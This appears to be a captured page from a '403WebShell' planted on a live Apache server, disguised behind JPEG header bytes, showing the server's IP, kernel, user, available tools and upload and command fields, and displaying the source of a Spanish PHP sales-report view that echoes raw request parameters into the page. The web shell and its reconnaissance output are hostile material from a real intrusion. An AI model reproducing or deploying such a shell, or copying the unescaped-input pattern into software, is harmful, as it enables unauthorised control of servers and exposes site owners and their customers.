����JFIF��H�H����Exif��MM�*���� ��3����V�����3������3�(��������������������3�����403WebShell
403Webshell
Server IP : 74.208.127.88  /  Your IP : 18.222.188.218
Web Server : Apache/2.4.41 (Ubuntu)
System : Linux ubuntu 5.4.0-163-generic #180-Ubuntu SMP Tue Sep 5 13:21:23 UTC 2023 x86_64
User : www-data ( 33)
PHP Version : 7.4.3-4ubuntu2.29
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/t/sae/appsae/core/app/view/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/t/sae/appsae/core/app/view/reportsLine-view.php
<?php
$clients = PersonData::getClients();
$users = UserData::getAll2();
?>

<section class="content">
	<div class="row">
		<div class="col-md-12">
		
	<nav class = "navbar navbar-inverse">
		<div class = "container-fluid">
			<a href = "#" class = "navbar-brand">Reportes de Ventas Por Categoria</a>
		</div>
	</nav>
	
</content>
	
<div class = "row-fluid" class="form-control">
	
<div class="panel panel-default">
		<hr style = "border-top:1px dotted #000;"/>
<div class = "form-inline">
	
<div class="row">
	<div class="col-md-12">
		<form>
								<input type="hidden" name="view" value="reportsLine">
		<div class="row">
		
		<div class="col-md-3">

		

		</div>

		<div class="col-md-3">
		<input type="date" name="sd" value="<?php if(isset($_GET["sd"])){ echo $_GET["sd"]; }?>" class="form-control">
		</div>
		<div class="col-md-3">
		<input type="date" name="ed" value="<?php if(isset($_GET["ed"])){ echo $_GET["ed"]; }?>" class="form-control">
		</div>

		<div class="col-md-1">
		<button type="submit" class="btn btn-primary btn-block"><i class="fa fa-file-text"></i></button>
		</div>

		</div>
		<!--
		<br>
		<div class="row">
		<div class="col-md-4">

		<select name="mesero_id" class="form-control">
			<option value="">--  MESEROS --</option>
			<?php foreach($meseros as $p):?>
			<option value="<?php echo $p->id;?>"><?php echo $p->name;?></option>
			<?php endforeach; ?>
		</select>

		</div>

		<div class="col-md-4">

		<select name="operation_type_id" class="form-control">
			<option value="1">VENTA</option>
		</select>

		</div>

		</div>
		-->
		</form>

	</div>
</div>
<br>	
<br><!--- -->
	
	<div class="row">
			
		<div class="col-md-12">
				<?php if(isset($_GET["sd"]) && isset($_GET["ed"]) ):?>
		<?php if($_GET["sd"]!=""&&$_GET["ed"]!=""):?>
					<?php 
					$operations = array();

					if($_GET["client_id"]=="" && $_GET["user_id"]==""){
					$operations = OperationData::getTsaleDetailByDate_line($_GET["sd"],$_GET["ed"]);
					//print_r($operations);
					//echo "exito";
					}


					 ?>

	<?php if(count($operations)>0):
					$supertotal = 0; ?>
	<div class = "table-responsive">
		<div class="box box-primary">
		<table class="table table-bordered">
			<thead class="alert-success">
				<th>#</th>
				<th>Codigo</th>
				<th>Nombre</th>
				<th>Precio U</th>
				<th>Cantidad</th>
				<th>Subtotal</th>
				<th></th>
			</thead>
		<?php	
			//print_r($operations);
			
			$categories = CategoryData::getAll();
			$total=0;
			$total_total=0;
			$contador=1;
			foreach($categories as $category){
				$contador += 1;
			
			//echo ($contador);
			
			//clico for para poner todas las categorias
			//
			//print_r($operations);
			$solouno=0;
			foreach($operations as $user){
				
					if(!empty($user->category_id)){
						if( ($user->category_id == $category->id) && $solouno == 0){
			?>
						<tr style="background:#red">
									<td colspan = "4" class="text-left" ><h4><u><?php echo CategoryData::getById($user->category_id)->name;?></u></h4></td>
						</tr>
			<?php	    $solouno=1;
						}
					}
				
			}
			foreach($operations as $user){
					
					$product = ProductData::getBycode($user->barcode);	
					
				//condicion para ver por categorias	
								
				if($user->category_id == $category->id){
					
					
					?>
						
					<tr style="background:#red">
							<td></td>
							<td><?php echo $user->barcode;?></td>
							<td><?php echo $user->item_name;?></td>
							
							<td>$ <?php $priceSinIva =  $user->price;
								$total = $total + $user->precio;
								echo number_format($priceSinIva,2);
							?></td>
							<td><?php echo $user->cant;?></td>
							<td><?php echo number_format($user->precio,2);?></td>
							<td><?php echo $user->category_id;?></td>
						</tr>
						
					<?php 
					//termina condicion de validar que exista un registro
					
				}
				//termina condicion de validar categoria
					
			}
				if($total>0){
				echo '
				<tr>
					<td colspan = "4" class="text-center"><b><u>Total: $
				'.number_format($total,2).'</b></u></td></tr>';
				$total_total = $total_total + $total;
				$total=0;
				}	
			
				 $solouno=0;
			}
			if($total_total>0){
				echo '
				<tr>
					<td colspan = "10" class="text-center"><b><u>Total: $
				'.number_format($total_total,2).'</b></u></td></tr>';
				//$total_total=0;
				}
			?>

		<script type="text/javascript">
				function thePDF() {
		var doc = new jsPDF('p', 'pt');
				doc.setFontSize(26);
				doc.text("<?php echo ConfigurationData::getByPreffix("company_name")->val;?>", 40, 65);
				doc.setFontSize(18);
				doc.text("REPORTE DE VENTAS", 40, 80);
				doc.setFontSize(12);
				doc.text("Usuario: <?php echo Core::$user->name." ".Core::$user->lastname; ?>  -  Fecha: <?php echo date("d-m-Y h:i:s");?> ", 40, 90);
		var columns = [
			{title: "Id", dataKey: "id"}, 
			{title: "Subtotal", dataKey: "subtotal"}, 
			{title: "Descuento", dataKey: "discount"}, 
			{title: "Total", dataKey: "total"}, 
			{title: "Cliente", dataKey: "client"}, 
			{title: "Vendedor", dataKey: "vendor"}, 
			{title: "Fecha", dataKey: "created_at"}, 
		];
		var rows = [
		  <?php foreach($operations as $operation):
		  ?>
			{
			  "id": "<?php echo $operation->id; ?>",
			  "subtotal": "$ <?php echo number_format($operation->total,2,'.',','); ?>",
			  "discount": "$ <?php echo number_format($operation->discount,2,'.',','); ?>",
			  "total": "$ <?php echo number_format($operation->total-$operation->discount,2,'.',','); ?>",
			  "client": "<?php if($operation->person_id!=null){$c= $operation->getPerson();echo $c->name." ".$c->lastname;} ?>",
			  "vendor": "<?php if($operation->user_id!=null){$c= $operation->getUser();echo $c->name." ".$c->lastname;} ?>",
			  "created_at": "<?php echo $operation->created_at; ?>",
			  },
		 <?php endforeach; ?>
		];
		doc.autoTable(columns, rows, {
			theme: 'grid',
			overflow:'linebreak',
			styles: { 
				fillColor: <?php echo Core::$pdf_table_fillcolor;?>
			},
			columnStyles: {
				id: {fillColor: <?php echo Core::$pdf_table_column_fillcolor;?>}
			},
			margin: {top: 100},
			afterPageContent: function(data) {
			}
		});
		doc.setFontSize(18);
		doc.text("TOTAL DE VENTAS: $ <?php echo number_format($supertotal,2,'.',','); ?>", 40, doc.autoTableEndPosY()+25);
		doc.setFontSize(12);
		doc.text("<?php echo Core::$pdf_footer;?>", 40, doc.autoTableEndPosY()+45);
		<?php 
		$con = ConfigurationData::getByPreffix("report_image");
		if($con!=null && $con->val!=""):
		?>
		var img = new Image();
		img.src= "storage/configuration/<?php echo $con->val;?>";
		img.onload = function(){
		doc.addImage(img, 'PNG', 495, 20, 60, 60,'mon');	
		doc.save('sellreports-<?php echo date("d-m-Y h:i:s",time()); ?>.pdf');
		}
		<?php else:?>
		doc.save('sellreports-<?php echo date("d-m-Y h:i:s",time()); ?>.pdf');
		<?php endif; ?>
		}
		</script>



		<?php else:
		// si no hay operaciones
		?>
		<script>
			$("#wellcome").hide();
		</script>
		<div class="jumbotron">
			<h2>No hay operaciones</h2>
			<p>El rango de fechas seleccionado no proporciono ningun resultado de operaciones.</p>
		</div>

					 <?php endif; ?>
		<?php else:?>
		<script>
			$("#wellcome").hide();
		</script>
		<div class="jumbotron">
			<h2>Fecha Incorrectas</h2>
			<p>Puede ser que no selecciono un rango de fechas, o el rango seleccionado es incorrecto.</p>
		</div>
		<?php endif;?>

				<?php endif; ?>
			</div>
			</div>
		</div>
		</div>
	</div>
	
</div>
</div>	

Youez - 2016 - github.com/yon3zu
LinuXploit